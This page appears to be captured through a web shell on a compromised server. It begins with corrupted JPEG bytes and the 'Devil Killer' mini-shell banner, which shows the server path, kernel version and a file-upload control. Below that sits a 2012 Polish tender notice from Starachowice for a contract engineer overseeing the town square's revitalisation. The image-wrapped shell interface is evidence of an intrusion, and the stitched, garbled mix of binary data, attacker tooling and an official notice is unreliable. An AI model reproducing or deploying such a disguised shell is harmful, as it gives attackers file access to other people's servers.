JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/6099-N-2012.html

<p class="kh_header"><b>Starachowice: Pełnienie obowiązków Inżyniera Kontraktu dla zadania pn. Rewitalizacja placu Rynku z przyległymi ulicami w Starachowicach</b><br>
<b>Numer ogłoszenia: 6099 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starachowice , ul. Radomska 45, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 82 75, faks 41 273 82 75.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.starachowice.eu/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Inżyniera Kontraktu dla zadania pn. Rewitalizacja placu Rynku z przyległymi ulicami w Starachowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera Kontraktu dla zadania pn. Rewitalizacja placu Rynku z przyległymi ulicami w Starachowicach.
Zakres usługi  obejmuje pełny zakres czynności jakie dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.). i będzie realizowany w następujących branżach:
- konstrukcyjno - budowlanej,
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,teletechnicznych,                                                           - instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych i kanalizacyjnych,

Zakres rzeczowy robót do nadzorowania.
Przebudowywany Rynek stanowi centrum układu urbanistycznego miasta objętego ochroną konserwatorską na podstawie ustaleń Miejscowego Planu Zagospodarowania Przestrzennego  (Uchwała Nr XI/20/2009 Rady Miejskiej w Starachowicach z dnia 27 listopada 2009r.).
Prace prowadzone będą pod nadzorem archeologicznym.
Zakres robót do realizacji tej inwestycji obejmuje:
1. przebudowę płyty Rynku wraz z przyległymi ulicami: Kościelna, Rzemieślnicza, Niska, Wysoka, Krótka, Kręta, ciąg pieszy do ul. Staffa część ul. Iłżeckiej - o łącznej powierzchni około 25812,1m2 w tym:
powierzchnia utwardzona - 22 416,3 m2 (jezdnia -5457,2m2, chodniki -15818,4m2, parkingi-1140,7m2),
powierzchnia biologicznie czynna- 3 395,8 m2 (trawniki i zieleńce -3231,3m2, nawierzchnie żwirowe -139,4m2, woda- 25,1m2)
2. przebudowę istniejącego układu drogowego,
3. uporządkowanie stref parkingowych i wprowadzenie ścieżki rowerowej wzdłuż północnej części płyty Rynku,
4. zmianę istniejących nawierzchni ulic, chodników, parkingów na nawierzchnie  między innymi z kostki granitowej, płyt granitowych, kostki bazaltowej,  kostki betonowej wibroprasowanej,
5. budowę na płycie rynku trzech podświetlanych fontann z żelbetowym podziemnym zbiornikiem wyrównawczym,
6. budowę schodów terenowych przy placu Rynku i przy parkingu przy ul. Rzemieślniczej,
7. rozbudowę istniejącego parkingu przy ul. Rzemieślniczej wraz z platformą widokową,
8. wykonanie licznych elementów małej architektury tj. murki oporowe, tarasowe kwatery kwiatowe w okładzinach z kamienia, ławki, kosze, alejki wewnętrzne na placu Rynku i innych elementów wskazanych w projektach, zagospodarowanie terenu i nasadzenie nowej zieleni,
9. rozbiórkę istniejącego podziemnego szaletu miejskiego i budowę nowego w miejscu  rozbiórki o kubaturze około 389m3 o konstrukcji żelbetowej,
10. przebudowę i budowę sieci infrastruktury technicznej w zakresie:
 sieci wodociągowej z rur PE (90mm-160mm) o łącznej długości ok.2004m,
 sieci kanalizacji sanitarnej z rur kamionkowych DN(150mm-250mm) o łącznej długości  ok. 1747m,
 sieci kanalizacji deszczowej z rur kamionkowych DN(150mm-500mm) o łącznej długości ok. 1977m,
 sieci gazowej z rur PE110/90 o dł ok. 1734 m,
 linii energetycznej nn o długości linii ok. 3722,0 mb oświetleniowej ok. 2798 m  i teletechnicznej o długości liniowej około 948 m.
Ponadto zamówienie obejmuje:
przebudowę sieci wodociągowej w ul. Dworcowej i ul. Marszałka Piłsudskiego rur PE 160mm dł. ok. 25m i z żeliwa sferoidalnego 250mm o długości ok. 40,50m,
przebudowę przyłącza energetycznego zasilającego Parafię Rzymskokatolicką w ul. Kościelnej o długości około 150mb wraz z przejściem przez drogę wojewódzką Armii Krajowej,
przebudowę sieci teletechnicznej w ul. Krętej o długości ok. 75m od strony ul. Spółdzielczej z napowietrznej na kablową.
Szczegółowy zakres robót przedstawia dokumentacja budowlana i wykonawcza oraz specyfikacje techniczne wykonania i odbioru robót (STWiOR).

Zakres i obowiązki Wykonawcy.
1) koordynacja i zarządzanie procesem inwestycyjnym w imieniu Zamawiającego, przy pełnieniu funkcji Inżyniera Kontraktu, Inspektora nadzoru inwestorskiego  zgodnie z obowiązkami określonymi przez polskie Prawo budowlane ( t.j. Dz.U. Z 2006r. nr 156 poz. 1118 z późniejszymi zmianami) oraz zgodnie z postanowieniami odpowiednich decyzji na prowadzenie budowy;
2) rozliczanie powykonawcze wykonanych robót ( sprawdzanie ilości robót, potwierdzanie zapisów w książce obmiarów - dla Wykonawcy robót budowlanych oraz w raportach przedkładanych przez Archeologa z nadzorowanych przez niego prac, potwierdzanie i przygotowywanie dokumentów do płatności częściowych i końcowych w podziale na koszty kwalifikowane i niekwalifikowane), oraz współdziałanie z Wykonawcą robót w przygotowywaniu dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie;
3) uzyskanie decyzji pozwolenia na użytkowanie;
4) współpraca z Zamawiającym celem przygotowania dokumentów sprawozdawczych do Instytucji Zarządzających RPO WŚ;
5) wykonywanie innych czynności, o których mowa w SIWZ i wzorze umowy;
6) wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją kontraktu;
7) przygotowanie materiałów i uczestniczenie w ewentualnych sprawach arbitrażowych dotyczących spraw spornych w przedmiocie zamówienia;
8) zapewnienie stałej wymiany informacji pomiędzy Wykonawcami uczestniczącymi w procesie inwestycji, a Zamawiającym oraz koordynacja swojej działalności z wymaganiami stawianymi przez Zamawiającego, Archeologa oraz Wykonawcę robót budowlanych;
9) uczestniczenie w procesie wyjaśnień w przypadku kontroli różnych instytucji;
10) zapewnienie dla Inżyniera Kontraktu i jego zespołu oraz Zamawiającego zaplecza biurowo-socjalnego na terenie miasta Starachowice, wyposażonego w sprzęt komputerowy i sprzęt peryferyjny;
11)  zapewnienie w zespole Inżyniera Kontraktu osoby ds. rozliczeń posiadającej doświadczenie w rozliczeniu inwestycji współfinansowanej ze środków UE i realizowanej dla Jednostek Samorządu Terytorialnego lub instytucji publicznej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zmówienia w zakresie nadzoru inwestorskiego z godnego z podstawowym zakresem zamówienia w branżach: drogowej, instalacyjnej (wodno-kanalizacyjnej, gazowej), konstrukcyjno - budowlanej, elektroenergetycznej, teletechnicznej</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz.596 i Nr 216, poz. 1824).
Wadium w wysokości : 12 000,00 zł	
należy wnieść:
1) w pieniądzu - przelewem na konto nr 17102026740000210200033225 Bank PKO BP SA   Oddział I w Ostrowcu Świętokrzyskim tytułem: WADIUM na przetarg Pełnienie obowiązków Inżyniera Kontraktu dla zadania pn. Rewitalizacja placu Rynku z przyległymi ulicami w Starachowicach - z takim wyliczeniem, aby wpłynęło na rachunek Zamawiającego najpóźniej w terminie złożenia oferty (wniesienie wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego);
2) w innych formach - w terminie składania oferty. Oryginał dokumentu zdeponować w kasie 
(w kopercie zaadresowanej na Urząd Miejski, Kasa ul. Radomska 45, 27-200 Starachowice, z dopiskiem WADIUM na przetarg Pełnienie obowiązków Inżyniera Kontraktu dla zadania pn. Rewitalizacja placu Rynku z przyległymi ulicami w Starachowicach, kopię dokumentu dołączyć do oferty).

Potwierdzone przez Wykonawcę za zgodność z oryginałem kopie przelewów oraz kopie  dokumentów dotyczących innych niż w pieniądzu form wadium, należy dołączyć do oferty najpóźniej w terminie jej składania.
Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykonanie w okresie ostatnich trzech lat dwóch usług polegających na pełnieniu nadzoru nad robotami budowlanymi wraz z przebudową infrastruktury technicznej o łącznej wartości 10 000 000,00 zł. (brutto).
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek mogą spełniać łącznie. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest dysponowanie:
Inżynierem Kontraktu - posiadającym wykształcenie wyższe techniczne, uprawnienia w nieograniczonym zakresie do kierowania robotami budowlanymi w branży drogowej lub innej branży, minimum 10 letnie doświadczenie zawodowe w tym co najmniej 5 letnie doświadczenie w kierowaniu zespołem ludzi nadzorujących budowy obiektów kubaturowych i różnej infrastruktury, w tym co najmniej przy jednym projekcie związanym z rewitalizacją układów miejskich lub w obrębie układów miejskich lub podobnych dotyczących budowy/przebudowy przestrzeni publicznej, placu lub pasażu pieszego lub ulic na obszarze objętym ochroną konserwatorską.
UWAGA! Zamawiający nie dopuszcza łączenia stanowiska Inżyniera Kontraktu ze stanowiskiem Inspektora nadzoru.
Inspektorem nadzoru w specjalności drogowej - posiadającym uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej zgodnie z prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające co do zakresu rzeczowego przedmiotowego postępowania; co najmniej 10-letnie doświadczenie zawodowe w tym minimum 5-letnie doświadczenie w kierowaniu lub nadzorowaniu robót w branży drogowej,
Inspektorem nadzoru w specjalności konstrukcyjno - budowlanej - posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej , zgodnie z prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające co do zakresu rzeczowego przedmiotowego postępowania; co najmniej 10-letnie doświadczenie zawodowe, w tym minimum 5-letnie doświadczenie w nadzorowaniu robót konstrukcyjno- budowlanych
Inspektorem nadzoru w specjalności sanitarnej - posiadającym uprawnienia do kierowania robotami sanitarnymi bez ograniczeń w zakresie sieci i instalacji wodociągowo-kanalizacyjnych, wentylacyjnych, gazowych zgodnie z prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające co do zakresu rzeczowego przedmiotowego postępowania; co najmniej 10-letnie doświadczenie zawodowe, w tym minimum 5-letnie doświadczenie w kierowaniu lub nadzorowaniu robót sieci i instalacji sanitarnych,
Inspektorem nadzoru w specjalności telekomunikacyjnej - posiadającym uprawnienia do kierowania robotami telekomunikacyjnymi bez ograniczeń zgodnie z prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające co do zakresu rzeczowego przedmiotowego postępowania, co najmniej 3 letnie doświadczenie w nadzorowaniu lub wykonawstwie inwestycji w specjalności telekomunikacyjnej,
Inspektorem nadzoru w specjalności elektrycznej - posiadającym uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z polskim Prawem budowlanym, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające co do zakresu rzeczowego przedmiotowego postępowania; co najmniej 10-letnie doświadczenie zawodowe, w tym minimum 5-letnie doświadczenie w kierowaniu lub nadzorowaniu robót elektrycznych.
UWAGA! Zamawiający dopuszcza łączenie funkcji w/w inspektorów nadzoru.
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek mogą spełniać łącznie. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz OFERTA, 
pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik (oryginał lub kopia poświadczona notarialnie),
dokumenty i oświadczenia wyszczególnione w punkcie 7 SIWZ,
potwierdzenie wniesienia wadium (zgodnie z pkt 10 SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 w/w ustawy Pzp zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy określając następujące warunki zmiany:
1. Zamawiający dopuszcza zmianę osoby ze stanowiska Inżyniera Kontraktu oraz inspektorów nadzoru i osoby ds. rozliczeń, tylko w przypadku wystąpienia okoliczności nie możliwych do przewidzenia (np. śmierci, choroby lub innych zdarzeń losowych), na osoby posiadające uprawnienia, wykształcenie oraz wiedzę i doświadczenie wymagane przez Zamawiającego w pkt 6 SIWZ. Zmianę należy zgłosić Zamawiającemu na piśmie wraz z podaniem informacji na temat uprawnień, doświadczenia i wykształcenia nowej osoby.
2. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie robót budowlanych.
3. Zamawiający dopuszcza zmianę terminu trwania umowy w przypadku:
a) wystąpienia niekorzystnych warunków atmosferycznych powodujących konieczność przerwania robót przez Wykonawcę, a także w przypadku wystąpienia siły wyższej, mającej bezpośredni wpływ na termin wykonania robót (np. klęski żywiołowe, strajki lokalne, kataklizmy),
b) w przypadku wystąpienia nieprzewidzianych robót (np. robót dodatkowych), mających wpływ na prawidłowe wykonanie przedmiotu umowy,
c) wstrzymania prac przez Wojewódzkiego Konserwatora Zabytków lub Nadzór Archeologiczny, mający bezpośredni wpływ na terminowość wykonania robót,
d) powstanie potrzeba przeprowadzenia dodatkowych badań lub ekspertyz, warunkujących 	terminowe wykonanie niniejszej umowy,
e) zaistnienia innych okoliczności niemożliwych wcześniej do przewidzenia i mających wpływ na termin realizacji zadania.
W przedstawionych w/w przypadkach w pkt 3 strony ustalą nowe terminy realizacji z tym, że okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju
z w/w przyczyn 
4. Dopuszcza się możliwość zmiany wynagrodzenia Wykonawcy za przedmiot zamówienia na skutek zmiany stawki podatku VAT, które podlegać będzie automatycznej zmianie odpowiednio o kwotę wzrostu lub obniżenia podatku VAT, a wynikającej ze stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego bez konieczności zawierania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Referat Zamówień Publicznych (pok. 111)ul. Radomska 45
